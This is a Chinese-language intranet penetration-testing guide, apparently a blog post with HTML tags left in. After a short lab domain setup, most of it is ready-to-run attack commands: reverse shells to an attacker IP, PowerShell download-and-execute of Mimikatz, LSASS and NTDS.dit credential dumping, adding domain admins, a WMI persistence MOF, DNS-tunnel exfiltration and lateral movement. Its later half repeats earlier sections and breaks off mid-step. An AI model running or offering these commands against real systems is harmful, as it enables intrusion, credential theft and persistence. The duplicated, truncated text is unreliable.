内网渗透学习指南：从零开始构建域环境与渗透测试<\/h1>

一、域环境搭建<\/h2>

1.1 准备工作<\/h3>

所需系统<\/strong>：

DC (域控制器): Windows Server 2008<\/li>
DM (域成员): Windows Server 2003<\/li>
DM (域成员): Windows XP<\/li> <\/ul> <\/li> <\/ul>
1.2 域控制器配置步骤<\/h3>

修改计算机名<\/strong>：为DC设置合适的名称<\/li>
配置固定IP<\/strong>：

确保网关设置正确（常见错误：网关设置错误应为192.168.206.2）<\/li> <\/ul> <\/li>
服务器管理器配置<\/strong>：

添加"Active Directory域服务"角色<\/li> <\/ul> <\/li>
安装域服务<\/strong>：

命令行执行：dcpromo<\/code><\/li>
注意：本地administrator密码需符合强密码要求，否则安装会失败<\/li> <\/ul> <\/li>
设置林根域<\/strong>：林指多域情况下形成的森林结构<\/li> 根表示基础域，其他域在此根部衍生<\/li> <\/ul> <\/li> 指定域数据存放地址<\/strong><\/li> <\/ol> 1.3 域成员配置<\/h3> 网络配置<\/strong>： DNS服务器应设置为主域控IP地址<\/li> <\/ul> <\/li> 加入域<\/strong>：使用域管理员凭据将成员机加入域<\/li> <\/ul> <\/li> <\/ul> 域搭建完成后，主域控会自动生成krbtgt<\/code>账号，这是Windows活动目录中使用的客户\/服务器认证协议，为通信双方提供双向身份认证<\/p> <\/blockquote> 二、端口转发与边界代理技术<\/h2> 2.1 Windows端口转发工具<\/h3> LCX工具<\/h4> 监听1234端口并转发到2333端口： lcx.exe -listen 1234<\/span> 2333<\/span> <\/span><\/span><\/code><\/pre><\/li> 将目标3389端口转发到本地1234端口： lcx.exe -slave 攻击机IP 1234<\/span> 127.0.0.1 3389<\/span> <\/span><\/span><\/code><\/pre><\/li> <\/ul> netsh命令<\/h4> 添加转发规则： netsh interface portproxy set v4tov4 listenaddress=<\/span>192.168.206.101 listenport=<\/span>3333<\/span> connectaddress=<\/span>192.168.206.100 connectport=<\/span>3389<\/span> <\/span><\/span><\/code><\/pre><\/li> 删除转发规则： netsh interface portproxy delete v4tov4 listenport=<\/span>9090<\/span> <\/span><\/span><\/code><\/pre><\/li> 查看现有规则： netsh interface portproxy show all <\/span><\/span><\/code><\/pre><\/li> <\/ul> 注意：XP系统需要先安装IPv6支持：netsh interface ipv6 install<\/code><\/p> <\/blockquote> 2.2 Linux端口转发工具<\/h3> portmap工具<\/h4> 监听1234端口并转发到2333端口： .\/portmap -m 2<\/span> -p1 1234<\/span> -p2 2333<\/span> <\/span><\/span><\/code><\/pre><\/li> 将目标3389端口转发到本地1234端口： .\/portmap -m 1<\/span> -p1 3389<\/span> -h2 目标IP -p2 1234<\/span> <\/span><\/span><\/code><\/pre><\/li> <\/ul> iptables配置<\/h4> 编辑\/etc\/sysctl.conf<\/code>：net.ipv4.ip_forward = 1<\/code><\/li> 关闭服务：service iptables stop<\/code><\/li> 配置规则示例： iptables -t nat -A PREROUTING --dst 边界IP -p tcp --dport 3389<\/span> -j DNAT --to-destination 内网IP:3389 <\/span><\/span>iptables -t nat -A POSTROUTING --dst 内网IP -p tcp --dport 3389<\/span> -j SNAT --to-source 边界IP <\/span><\/span><\/code><\/pre><\/li> 保存并重启服务： service iptables save &&<\/span> service iptables start <\/span><\/span><\/code><\/pre><\/li> <\/ol> 2.3 Socket代理工具<\/h3> Windows环境<\/h4> 推荐使用Proxifier进行socket连接<\/li> <\/ul> Linux环境<\/h4> 推荐使用proxychains：配置文件路径：\/etc\/proxychains.conf<\/code><\/li> 添加代理规则：socks5 127.0.0.1 8888<\/code><\/li> 使用方式：在命令前加proxychains<\/code><\/li> <\/ul> <\/li> <\/ul> EarthWorm工具<\/h4> 跨平台+端口转发+socket代理结合体<\/li> 支持多种代理模式<\/li> <\/ul> 2.4 HTTP隧道技术<\/h3> Tunna工具<\/h4> 端口转发示例： python proxy.py -u http:\/\/目标网站\/conn.jsp -l 1234<\/span> -r 3389<\/span> -v <\/span><\/span><\/code><\/pre><\/li> 转发SSH等不能中断的服务： python proxy.py -u http:\/\/目标网站\/conn.jsp -l 1234<\/span> -r 22<\/span> -v -s <\/span><\/span><\/code><\/pre><\/li> <\/ul> reGeorg工具<\/h4> SOCKS代理示例： python reGeorgSocksProxy.py -u http:\/\/目标IP\/tunnel.php -p 8081<\/span> <\/span><\/span><\/code><\/pre><\/li> <\/ul> 2.5 SSH通道技术<\/h3> 端口转发<\/h4> 本地转发： ssh -CfNg -L 本地端口:127.0.0.1:远程端口用户名@目标主机 <\/span><\/span><\/code><\/pre><\/li> 远程转发： ssh -CfNg -R 远程端口:127.0.0.1:本地端口用户名@目标主机 <\/span><\/span><\/code><\/pre><\/li> <\/ul> SOCKS代理<\/h4> 创建SOCKS代理： ssh -qTfnN -D 端口远程主机 <\/span><\/span><\/code><\/pre><\/li> <\/ul> 三、Shell获取技术<\/h2> 3.1 常规Shell反弹<\/h3> Bash反弹<\/h4> bash -i >& \/dev\/tcp\/攻击IP\/端口 0>&1<\/span> <\/span><\/span><\/code><\/pre>Python反弹<\/h4> python -<\/span>c 'import socket,subprocess,os;s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);s.connect(("攻击IP",端口));os.dup2(s.fileno(),0); os.dup2(s.fileno(),1); os.dup2(s.fileno(),2);p=subprocess.call(["\/bin\/sh","-i"]);'<\/span> <\/span><\/span><\/code><\/pre>NC反弹<\/h4> rm \/tmp\/f;mkfifo \/tmp\/f;cat \/tmp\/f|\/bin\/sh -i 2>&1|nc 攻击IP 端口 >\/tmp\/f <\/span><\/span><\/code><\/pre>3.2 ICMP Shell反弹<\/h3> 适用于防火墙限制TCP但允许ICMP的情况<\/li> Kali端运行： .\/icmpsh_m.py 攻击IP 目标IP <\/span><\/span><\/code><\/pre><\/li> Windows端运行： icmpsh.exe -t KaliIP -d 500<\/span> -b 30<\/span> -s 128<\/span> <\/span><\/span><\/code><\/pre><\/li> <\/ul> 3.3 正向Shell<\/h3> Linux： nc -e \/bin\/sh -lp 端口 <\/span><\/span><\/code><\/pre><\/li> Windows： nc.exe -e cmd.exe -lp 端口 <\/span><\/span><\/code><\/pre><\/li> <\/ul> 四、内网信息收集<\/h2> 4.1 基本命令<\/h3> 网络信息收集<\/h4> 获取当前组计算机名： net view <\/span><\/span><\/code><\/pre><\/li> 查看所有域： net view \/domain <\/span><\/span><\/code><\/pre><\/li> 从计算机名获取IP： ping -n 1 计算机名 -4 <\/span><\/span><\/code><\/pre><\/li> 批量Ping获取IP（BAT脚本）： @echo<\/span> off <\/span><\/span>setlocal<\/span> ENABLEDELAYEDEXPANSION <\/span><\/span>@FOR<\/span> \/F<\/span> "usebackq eol=- skip=1 delims=\"<\/span> %%<\/span>j IN<\/span> (`net view ^| find "命令成功完成" \/v ^|find "The command completed successfully." \/v`<\/span>) DO<\/span> ( <\/span><\/span> @FOR<\/span> \/F<\/span> "usebackq delims="<\/span> %%<\/span>i IN<\/span> (`@ping -n 1 -4 <\/span>%%<\/span>j ^| findstr "Pinging"`<\/span>) DO<\/span> ( <\/span><\/span> @FOR<\/span> \/F<\/span> "usebackq tokens=2 delims=[]"<\/span> %%<\/span>k IN<\/span> (`echo <\/span>%%<\/span>i`<\/span>) DO<\/span> (echo<\/span> %%<\/span>k %%<\/span>j) <\/span><\/span> ) <\/span><\/span>) <\/span><\/span><\/code><\/pre><\/li> <\/ul> 用户与组信息<\/h4> 查看域中用户名： net user \/domain <\/span><\/span>或 <\/span><\/span>dsquery user <\/span><\/span><\/code><\/pre><\/li> 查询域组名称： net group \/domain <\/span><\/span><\/code><\/pre><\/li> 查询域管理员： net group "Domain Admins"<\/span> \/domain <\/span><\/span><\/code><\/pre><\/li> 添加域管理员账号： net user 用户名密码 \/add \/domain <\/span><\/span>net group "Domain Admins"<\/span> 用户名 \/add \/domain <\/span><\/span><\/code><\/pre><\/li> <\/ul> 系统信息<\/h4> 查看当前计算机信息： net config Workstation <\/span><\/span><\/code><\/pre><\/li> 查看域控制器： net group "Domain controllers"<\/span> <\/span><\/span><\/code><\/pre><\/li> 查询所有计算机名称： dsquery computer <\/span><\/span>或 <\/span><\/span>net group "Domain Computers"<\/span> \/domain <\/span><\/span><\/code><\/pre><\/li> <\/ul> 4.2 定位域控技术<\/h3> 查看域时间及域服务器名： net time \/domain <\/span><\/span><\/code><\/pre><\/li> DNS查询： nslookup -type=SRV _ldap._tcp. <\/span><\/span><\/code><\/pre><\/li> 通过ipconfig查找DNS地址： ipconfig \/all <\/span><\/span><\/code><\/pre><\/li> 查询域控： net group "Domain Controllers"<\/span> \/domain <\/span><\/span><\/code><\/pre><\/li> <\/ul> 4.3 端口扫描与分析<\/h3> 常见内网端口利用<\/h4> 端口<\/th> 服务<\/th> 攻击技巧<\/th> <\/tr> <\/thead> 21\/22\/69<\/td> FTP\/TFTP<\/td> 爆破、嗅探、溢出、后门<\/td> <\/tr> 23<\/td> Telnet<\/td> 爆破、嗅探<\/td> <\/tr> 25<\/td> SMTP<\/td> 邮件伪造<\/td> <\/tr> 53<\/td> DNS<\/td> 区域传输、劫持、缓存投毒<\/td> <\/tr> 135<\/td> RPC<\/td> 溢出攻击<\/td> <\/tr> 139<\/td> SMB<\/td> 爆破、未授权访问<\/td> <\/tr> 389<\/td> LDAP<\/td> 注入攻击<\/td> <\/tr> 1433<\/td> MSSQL<\/td> 爆破、注入<\/td> <\/tr> 3389<\/td> RDP<\/td> 爆破、Shift后门<\/td> <\/tr> 5985<\/td> WinRM<\/td> PowerShell远程管理<\/td> <\/tr> <\/tbody> <\/table> 扫描工具<\/h4> nbtscan<\/strong>：<\/p> 获取MAC地址：nbtstat -A IP<\/code><\/li> 扫描网络：nbtscan 192.168.1.0\/24<\/code><\/li> 关键信息：SHARING<\/code>表示开放共享，DC<\/code>表示可能是域控<\/li> <\/ul> <\/li> WinScanX<\/strong>：<\/p> WinScanX.exe -3 目标IP 域名\用户名密码 -a > 结果.txt <\/span><\/span><\/code><\/pre>可获取详细系统信息，包括SNMP信息和密码猜解<\/p> <\/li> InsightScan<\/strong>：<\/p> proxychains python scanner.py 192.168.0.0\/24 -N <\/span><\/span><\/code><\/pre><\/li> <\/ol> 五、内网文件传输技术<\/h2> 5.1 Windows文件传输<\/h3> PowerShell下载<\/h4> $d = New-Object System.Net.WebClient <\/span><\/span>$d.DownloadFile("http:\/\/攻击机\/file.zip"<\/span>,"c:\/1.zip"<\/span>) <\/span><\/span><\/code><\/pre>执行时可能需要绕过限制：<\/p> powershell -ExecutionPolicy Bypass -File<\/span> .\script.ps1 <\/span><\/span><\/code><\/pre>VBS脚本下载<\/h4> Set xPost=createObject("Microsoft.XMLHTTP") xPost.Open "GET","http:\/\/攻击机\/file.zip",0 xPost.Send() set sGet=createObject("ADODB.Stream") sGet.Mode=3 sGet.Type=1 sGet.Open() sGet.Write xPost.ResponseBody sGet.SaveToFile "c:\file.zip",2 <\/code><\/pre> 执行：cscript test.vbs<\/code><\/p> bitsadmin下载<\/h4> bitsadmin \/transfer 任务名 http:\/\/攻击机\/file.zip c:\1.zip <\/span><\/span><\/code><\/pre>文件共享<\/h4> net use x: \\IP\share \/user:域名\用户密码 <\/span><\/span><\/code><\/pre>Telnet接收数据<\/h4> 服务端：nc -lvp 23 < nc.exe<\/code><\/li> 下载端：telnet IP -f c:\nc.exe<\/code><\/li> <\/ul> 5.2 Linux文件传输<\/h3> Perl下载<\/h4> #!\/usr\/bin\/perl<\/span> <\/span><\/span>use<\/span> LWP::Simple <\/span><\/span>getstore("http:\/\/攻击机\/file.zip"<\/span>, "\/root\/1.zip"<\/span>); <\/span><\/span><\/code><\/pre>Python下载<\/h4> #!\/usr\/bin\/python<\/span> <\/span><\/span>import<\/span> urllib2 <\/span><\/span>u =<\/span> urllib2.<\/span>urlopen('http:\/\/攻击机\/file.zip'<\/span>) <\/span><\/span>localFile =<\/span> open('\/root\/1.zip'<\/span>, 'w'<\/span>) <\/span><\/span>localFile.<\/span>write(u.<\/span>read()) <\/span><\/span>localFile.<\/span>close() <\/span><\/span><\/code><\/pre>Wget下载<\/h4> wget http:\/\/攻击机\/file.zip -P \/root\/ <\/span><\/span><\/code><\/pre>通过SSH上传<\/h4> tar zcf - \/本地目录 | ssh 用户名@远程主机 "cd \/目标路径;tar zxpf -"<\/span> <\/span><\/span><\/code><\/pre>DNS隧道传输<\/h4> tar zcf - 本地目录 | xxd -p -c 16<\/span> | while<\/span> read line; do<\/span> host $line.域名.com 远程主机; done<\/span> <\/span><\/span><\/code><\/pre>5.3 其他传输方式<\/h3> FTP下载<\/h4> Windows下非交互式下载：<\/p> echo<\/span> open 主机 > ftp.txt <\/span><\/span>echo<\/span> 用户名 >> ftp.txt <\/span><\/span>echo<\/span> 密码 >> ftp.txt <\/span><\/span>echo<\/span> bin >> ftp.txt <\/span><\/span>echo<\/span> get 文件 >> ftp.txt <\/span><\/span>echo<\/span> bye >> ftp.txt <\/span><\/span>ftp -s:ftp.txt <\/span><\/span><\/code><\/pre>NC传输<\/h4> 服务端：cat 文件 | nc -l 端口<\/code><\/li> 下载端：nc 主机IP 端口 > 文件<\/code><\/li> <\/ul> SMB共享<\/h4> Linux配置SMB：<\/p> [<\/span>共享名]<\/span> <\/span><\/span>comment =<\/span> File Server Share <\/span><\/span>path =<\/span> \/tmp\/ <\/span><\/span>browseable =<\/span> yes <\/span><\/span>writable =<\/span> yes <\/span><\/span>guest ok =<\/span> yes <\/span><\/span>read only =<\/span> no <\/span><\/span>create mask =<\/span> 0755<\/span> <\/span><\/span><\/code><\/pre>Windows连接：<\/p> net use 盘符: \\IP\共享名 <\/span><\/span><\/code><\/pre>六、Hash抓取技术<\/h2> 6.1 Windows Hash简介<\/h3> LM Hash<\/strong>：较旧的不安全算法，Win2000\/XP\/2003默认使用<\/li> NTLM Hash<\/strong>：较新的算法，当密码超过14位时使用<\/li> Hash存储位置： SAM文件：本地用户<\/li> NTDS.DIT文件：域用户<\/li> <\/ul> <\/li> <\/ul> 6.2 本地Hash抓取<\/h3> PowerShell脚本<\/h4> Get-PassHashes.ps1 <\/span><\/span><\/code><\/pre>注册表导出+分析<\/h4> reg save hklm\sam sam.hive <\/span><\/span>reg save hklm\system system.hive <\/span><\/span>reg save hklm\security security.hive <\/span><\/span><\/code><\/pre>使用QuarkPwDump分析：<\/p> QuarkPwDump.exe -dhl -o "c:\hash.txt"<\/span> <\/span><\/span><\/code><\/pre>明文密码抓取<\/h4> GetPass工具<\/strong>：从内存获取明文密码<\/li> Win8\/2012需要修改注册表： reg add HKLM\SYSTEM\CurrentControlSet\Control\SecurityProviders\WDigest \/v UseLogonCredential \/t REG_DWORD \/d 1 <\/span><\/span><\/code><\/pre><\/li> <\/ul> 6.3 Mimikatz使用<\/h3> 获取内存中的明文密码： privilege::debug <\/span><\/span>sekurlsa::logonpasswords <\/span><\/span><\/code><\/pre><\/li> 非交互式抓取： mimikatz.exe "privilege::debug"<\/span> "sekurlsa::logonpasswords"<\/span> > password.txt <\/span><\/span><\/code><\/pre><\/li> PowerShell加载： IEX (New-Object Net.WebClient).DownloadString('http:\/\/攻击机\/Invoke-Mimikatz.ps1'<\/span>); Invoke-Mimikatz <\/span><\/span><\/code><\/pre><\/li> ProcDump+本地分析： procdump.exe -accepteula -ma lsass.exe lsass.dmp <\/span><\/span>mimikatz.exe "sekurlsa::minidump lsass.dmp"<\/span> "sekurlsa::logonpasswords full"<\/span> <\/span><\/span><\/code><\/pre><\/li> <\/ul> 6.4 域Hash抓取<\/h3> ntdsutil导出NTDS.DIT<\/h4> 创建快照： ntdsutil snapshot "activate instance ntds"<\/span> create quit quit <\/span><\/span><\/code><\/pre><\/li> 挂载快照： ntdsutil snapshot "mount {GUID}"<\/span> quit quit <\/span><\/span><\/code><\/pre><\/li> 复制文件： copy<\/span> MOUNT_POINT\windows\ntds\ntds.dit c:\ntds.dit <\/span><\/span><\/code><\/pre><\/li> 卸载删除快照： ntdsutil snapshot "unmount {GUID}"<\/span> "delete {GUID}"<\/span> quit quit <\/span><\/span><\/code><\/pre><\/li> <\/ol> QuarkPwDump分析<\/h4> 在线提取： QuarkPwDump.exe --dump-hash-domain --with-history --ntds-file c:\ntds.dit <\/span><\/span><\/code><\/pre><\/li> 离线提取（需system.hiv）： QuarkPwDump.exe --dump-hash-domain --with-history --ntds-file c:\ntds.dit --system-file c:\system.hiv <\/span><\/span><\/code><\/pre><\/li> <\/ul> vssown.vbs + libesedb + NtdsXtract<\/h4> 使用vssown.vbs创建卷影拷贝： cscript vssown.vbs \/start <\/span><\/span>cscript vssown.vbs \/create c <\/span><\/span>cscript vssown.vbs \/list <\/span><\/span>cscript vssown.vbs \/delete {GUID} <\/span><\/span><\/code><\/pre><\/li> 复制出ntds.dit和system文件<\/li> Linux环境下使用libesedb和NtdsXtract分析<\/li> <\/ol> PowerShell(DSInternals)分析<\/h4> 允许执行脚本： Set-ExecutionPolicy Unrestricted <\/span><\/span><\/code><\/pre><\/li> 导入模块： Import-Module .\DSInternals <\/span><\/span><\/code><\/pre><\/li> 分析Hash： $key = Get-BootKey -SystemHivePath 'C:\SYSTEM'<\/span> <\/span><\/span>Get-ADDBAccount -All -DBPath 'C:\ntds.dit'<\/span> -BootKey $key | Out-File hash.txt <\/span><\/span><\/code><\/pre><\/li> <\/ol> 七、远程连接与执行技术<\/h2> 7.1 at&schtasks<\/h3> 经典流程：建立IPC$连接： net use \\目标IP\ipc$ 密码 \/user:账号 <\/span><\/span><\/code><\/pre><\/li> 复制文件： copy<\/span> batch.bat \\目标IP\admin$\batch.bat <\/span><\/span><\/code><\/pre><\/li> 查看时间： net time \\目标IP <\/span><\/span><\/code><\/pre><\/li> 添加任务： at \\目标IP 时间 \\目标IP\admin$\batch.bat <\/span><\/span><\/code><\/pre>注意：6:21指上午时间，下午需用6.21PM<\/li> 查看任务： at \\目标IP <\/span><\/span><\/code><\/pre><\/li> <\/ol> <\/li> <\/ul> 7.2 PsExec<\/h3> 基本用法： psexec.exe \\目标IP -u 用户名 -p 密码 program.exe <\/span><\/span><\/code><\/pre><\/li> 常用参数： -c<\/code>：拷贝文件到远程机器并运行（运行后自动删除）<\/li> -d<\/code>：不等待程序执行完就返回<\/li> -accepteula<\/code>：绕过首次运行的许可协议<\/li> <\/ul> <\/li> <\/ul> 7.3 WMIC<\/h3> 执行命令： wmic \/node:目标IP \/user:用户名 \/password:密码 process call create "c:\windows\temp\batch.bat"<\/span> <\/span><\/span><\/code><\/pre><\/li> <\/ul> 7.4 wmiexec.vbs<\/h3> 半交互模式： cscript.exe \/\/nologo wmiexec.vbs \/shell 目标IP 用户名密码 <\/span><\/span><\/code><\/pre><\/li> 单命令执行： cscript.exe wmiexec.vbs \/cmd 目标IP 用户名密码 "命令"<\/span> <\/span><\/span><\/code><\/pre><\/li> Hash注入： wce -s LMHASH:NTHASH <\/span><\/span>cscript.exe \/\/nologo wmiexec.vbs \/shell 目标IP <\/span><\/span><\/code><\/pre><\/li> <\/ul> 7.5 smbexec<\/h3> 使用方式： smbexec.exe 目标IP 用户名密码命令共享名 <\/span><\/span><\/code><\/pre><\/li> <\/ul> 7.6 PowerShell Remoting<\/h3> 示例： Invoke-PowerShellWmi.ps1 -ComputerName 目标<\/span>IP -Username 用户名<\/span> -Password 密码<\/span> -Command "命令"<\/span> <\/span><\/span><\/code><\/pre><\/li> <\/ul> 7.7 SC创建服务<\/h3> 系统权限： sc \\目标IP create 服务名 binpath= c:\cmd.exe <\/span><\/span>sc \\目标IP start 服务名 <\/span><\/span>sc \\目标IP delete 服务名 <\/span><\/span><\/code><\/pre><\/li> 指定用户权限： sc \\目标IP create 服务名 binpath= "c:\cmd.exe"<\/span> obj= "域名\用户名"<\/span> password= 密码 <\/span><\/span><\/code><\/pre><\/li> <\/ul> 7.8 schtasks计划任务<\/h3> 创建任务： schtasks \/create \/tn 任务名 \/tr 执行命令 \/sc once \/st 时间 \/S 目标IP \/RU System <\/span><\/span><\/code><\/pre><\/li> 运行任务： schtasks \/run \/tn 任务名 \/S 目标IP <\/span><\/span><\/code><\/pre><\/li> 删除任务： schtasks \/F \/delete \/tn 任务名 \/S 目标IP <\/span><\/span><\/code><\/pre><\/li> <\/ul> 7.9 SMB+MOF\/DLL劫持<\/h3> MOF文件示例： #pragma namespace("\\\\.\\root\\subscription") instance of __EventFilter as $EventFilter { EventNamespace = "Root\\Cimv2"; Name = "filtP2"; Query = "Select * From __InstanceModificationEvent " "Where TargetInstance Isa \"Win32_LocalTime\" " "And TargetInstance.Second = 5"; QueryLanguage = "WQL"; }; instance of ActiveScriptEventConsumer as $Consumer { Name = "consPCSV2"; ScriptingEngine = "JScript"; ScriptText = "var WSH = new ActiveXObject(\"WScript.Shell\")\nWSH.run(\"net.exe user admin Admin123! \/add\")"; }; instance of __FilterToConsumerBinding { Consumer = $Consumer; Filter = $EventFilter; }; <\/code><\/pre> <\/li> <\/ul> 7.10 PTH + compmgmt.msc<\/h3> 使用Pass-the-Hash攻击配合计算机管理工具进行远程管理<\/li> <\/ul> 八、实用技巧与工具<\/h2> 8.1 文件编译技术<\/h3> PowerShell转换exe与txt<\/h4> Exe转Text： [byte[]]<\/span> $hexdump = get-content -encoding byte -path "nc.exe"<\/span> <\/span><\/span>[System.IO.File]<\/span>::WriteAllLines("nc.txt"<\/span>, ([string]<\/span>$hexdump)) <\/span><\/span><\/code><\/pre><\/li> Text转Exe： [String]<\/span>$hexdump = get-content -path "nc.txt"<\/span> <\/span><\/span>[Byte[]]<\/span> $temp = $hexdump -split ' '<\/span> <\/span><\/span>[System.IO.File]<\/span>::WriteAllBytes("nc1.exe"<\/span>, $temp) <\/span><\/span><\/code><\/pre><\/li> <\/ul> csc.exe编译C#源码<\/h4> csc.exe \/out:C:\path\output.exe C:\path\source.cs <\/span><\/span><\/code><\/pre>debug程序转换<\/h4> 将exe转换为hex格式<\/li> 通过echo写入文件<\/li> 使用debug还原为exe<\/li> <\/ol> 8.2 内网渗透常用工具<\/h3> EarthWorm<\/strong>：跨平台端口转发与代理<\/li> Tunna<\/strong>：HTTP隧道工具<\/li> reGeorg<\/strong>：基于Web的SOCKS代理<\/li> QuarkPwDump<\/strong>：Hash提取工具<\/li> Mimikatz<\/strong>：凭据提取神器<\/li> Nishang<\/strong>：PowerShell渗透框架<\/li> DSInternals<\/strong>：PowerShell活动目录分析工具<\/li> ProcDump<\/strong>：进程内存转储工具<\/li> vshadow<\/strong>：微软卷影拷贝工具<\/li> libesedb+NtdsXtract<\/strong>：NTDS.DIT分析工具链<\/li> <\/ol> 8.3 实用资源链接<\/h3> EarthWorm工具<\/a><\/li> Tunna工具详解<\/a><\/li> SSH端口转发指南<\/a><\/li> 端口利用大全<\/a><\/li> 各种语言反弹Shell<\/a><\/li> DSInternals使用指南<\/a><\/li> <\/ol>

端口<\/th>	服务<\/th>	攻击技巧<\/th> <\/tr> <\/thead>
21\/22\/69<\/td>	FTP\/TFTP<\/td>	爆破、嗅探、溢出、后门<\/td> <\/tr>
23<\/td>	Telnet<\/td>	爆破、嗅探<\/td> <\/tr>
25<\/td>	SMTP<\/td>	邮件伪造<\/td> <\/tr>
53<\/td>	DNS<\/td>	区域传输、劫持、缓存投毒<\/td> <\/tr>
135<\/td>	RPC<\/td>	溢出攻击<\/td> <\/tr>
139<\/td>	SMB<\/td>	爆破、未授权访问<\/td> <\/tr>
389<\/td>	LDAP<\/td>	注入攻击<\/td> <\/tr>
1433<\/td>	MSSQL<\/td>	爆破、注入<\/td> <\/tr>
3389<\/td>	RDP<\/td>	爆破、Shift后门<\/td> <\/tr>
5985<\/td>	WinRM<\/td>	PowerShell远程管理<\/td> <\/tr> <\/tbody> <\/table> 扫描工具<\/h4> nbtscan<\/strong>：<\/p> 获取MAC地址：`nbtstat -A IP<\/code><\/li>` `扫描网络：nbtscan 192.168.1.0\/24<\/code><\/li>` `关键信息：SHARING<\/code>表示开放共享，DC<\/code>表示可能是域控<\/li> <\/ul> <\/li>` WinScanX<\/strong>：<\/p> WinScanX.exe -3 目标IP 域名\用户名密码 -a > 结果.txt <\/span><\/span><\/code><\/pre>可获取详细系统信息，包括SNMP信息和密码猜解<\/p> <\/li> InsightScan<\/strong>：<\/p> proxychains python scanner.py 192.168.0.0\/24 -N <\/span><\/span><\/code><\/pre><\/li> <\/ol> 五、内网文件传输技术<\/h2> 5.1 Windows文件传输<\/h3> PowerShell下载<\/h4> $d = New-Object System.Net.WebClient <\/span><\/span>$d.DownloadFile("http:\/\/攻击机\/file.zip"<\/span>,"c:\/1.zip"<\/span>) <\/span><\/span><\/code><\/pre>执行时可能需要绕过限制：<\/p> powershell -ExecutionPolicy Bypass -File<\/span> .\script.ps1 <\/span><\/span><\/code><\/pre>VBS脚本下载<\/h4> Set xPost=createObject("Microsoft.XMLHTTP") xPost.Open "GET","http:\/\/攻击机\/file.zip",0 xPost.Send() set sGet=createObject("ADODB.Stream") sGet.Mode=3 sGet.Type=1 sGet.Open() sGet.Write xPost.ResponseBody sGet.SaveToFile "c:\file.zip",2 <\/code><\/pre> 执行：cscript test.vbs<\/code><\/p> bitsadmin下载<\/h4> bitsadmin \/transfer 任务名 http:\/\/攻击机\/file.zip c:\1.zip <\/span><\/span><\/code><\/pre>文件共享<\/h4> net use x: \\IP\share \/user:域名\用户密码 <\/span><\/span><\/code><\/pre>Telnet接收数据<\/h4> 服务端：nc -lvp 23 < nc.exe<\/code><\/li> 下载端：telnet IP -f c:\nc.exe<\/code><\/li> <\/ul> 5.2 Linux文件传输<\/h3> Perl下载<\/h4> #!\/usr\/bin\/perl<\/span> <\/span><\/span>use<\/span> LWP::Simple <\/span><\/span>getstore("http:\/\/攻击机\/file.zip"<\/span>, "\/root\/1.zip"<\/span>); <\/span><\/span><\/code><\/pre>Python下载<\/h4> #!\/usr\/bin\/python<\/span> <\/span><\/span>import<\/span> urllib2 <\/span><\/span>u =<\/span> urllib2.<\/span>urlopen('http:\/\/攻击机\/file.zip'<\/span>) <\/span><\/span>localFile =<\/span> open('\/root\/1.zip'<\/span>, 'w'<\/span>) <\/span><\/span>localFile.<\/span>write(u.<\/span>read()) <\/span><\/span>localFile.<\/span>close() <\/span><\/span><\/code><\/pre>Wget下载<\/h4> wget http:\/\/攻击机\/file.zip -P \/root\/ <\/span><\/span><\/code><\/pre>通过SSH上传<\/h4> tar zcf - \/本地目录 \| ssh 用户名@远程主机 "cd \/目标路径;tar zxpf -"<\/span> <\/span><\/span><\/code><\/pre>DNS隧道传输<\/h4> tar zcf - 本地目录 \| xxd -p -c 16<\/span> \| while<\/span> read line; do<\/span> host $line.域名.com 远程主机; done<\/span> <\/span><\/span><\/code><\/pre>5.3 其他传输方式<\/h3> FTP下载<\/h4> Windows下非交互式下载：<\/p> echo<\/span> open 主机 > ftp.txt <\/span><\/span>echo<\/span> 用户名 >> ftp.txt <\/span><\/span>echo<\/span> 密码 >> ftp.txt <\/span><\/span>echo<\/span> bin >> ftp.txt <\/span><\/span>echo<\/span> get 文件 >> ftp.txt <\/span><\/span>echo<\/span> bye >> ftp.txt <\/span><\/span>ftp -s:ftp.txt <\/span><\/span><\/code><\/pre>NC传输<\/h4> 服务端：cat 文件 \| nc -l 端口<\/code><\/li> 下载端：nc 主机IP 端口 > 文件<\/code><\/li> <\/ul> SMB共享<\/h4> Linux配置SMB：<\/p> [<\/span>共享名]<\/span> <\/span><\/span>comment =<\/span> File Server Share <\/span><\/span>path =<\/span> \/tmp\/ <\/span><\/span>browseable =<\/span> yes <\/span><\/span>writable =<\/span> yes <\/span><\/span>guest ok =<\/span> yes <\/span><\/span>read only =<\/span> no <\/span><\/span>create mask =<\/span> 0755<\/span> <\/span><\/span><\/code><\/pre>Windows连接：<\/p> net use 盘符: \\IP\共享名 <\/span><\/span><\/code><\/pre>六、Hash抓取技术<\/h2> 6.1 Windows Hash简介<\/h3> LM Hash<\/strong>：较旧的不安全算法，Win2000\/XP\/2003默认使用<\/li> NTLM Hash<\/strong>：较新的算法，当密码超过14位时使用<\/li> Hash存储位置： SAM文件：本地用户<\/li> NTDS.DIT文件：域用户<\/li> <\/ul> <\/li> <\/ul> 6.2 本地Hash抓取<\/h3> PowerShell脚本<\/h4> Get-PassHashes.ps1 <\/span><\/span><\/code><\/pre>注册表导出+分析<\/h4> reg save hklm\sam sam.hive <\/span><\/span>reg save hklm\system system.hive <\/span><\/span>reg save hklm\security security.hive <\/span><\/span><\/code><\/pre>使用QuarkPwDump分析：<\/p> QuarkPwDump.exe -dhl -o "c:\hash.txt"<\/span> <\/span><\/span><\/code><\/pre>明文密码抓取<\/h4> GetPass工具<\/strong>：从内存获取明文密码<\/li> Win8\/2012需要修改注册表： reg add HKLM\SYSTEM\CurrentControlSet\Control\SecurityProviders\WDigest \/v UseLogonCredential \/t REG_DWORD \/d 1 <\/span><\/span><\/code><\/pre><\/li> <\/ul> 6.3 Mimikatz使用<\/h3> 获取内存中的明文密码： privilege::debug <\/span><\/span>sekurlsa::logonpasswords <\/span><\/span><\/code><\/pre><\/li> 非交互式抓取： mimikatz.exe "privilege::debug"<\/span> "sekurlsa::logonpasswords"<\/span> > password.txt <\/span><\/span><\/code><\/pre><\/li> PowerShell加载： IEX (New-Object Net.WebClient).DownloadString('http:\/\/攻击机\/Invoke-Mimikatz.ps1'<\/span>); Invoke-Mimikatz <\/span><\/span><\/code><\/pre><\/li> ProcDump+本地分析： procdump.exe -accepteula -ma lsass.exe lsass.dmp <\/span><\/span>mimikatz.exe "sekurlsa::minidump lsass.dmp"<\/span> "sekurlsa::logonpasswords full"<\/span> <\/span><\/span><\/code><\/pre><\/li> <\/ul> 6.4 域Hash抓取<\/h3> ntdsutil导出NTDS.DIT<\/h4> 创建快照： ntdsutil snapshot "activate instance ntds"<\/span> create quit quit <\/span><\/span><\/code><\/pre><\/li> 挂载快照： 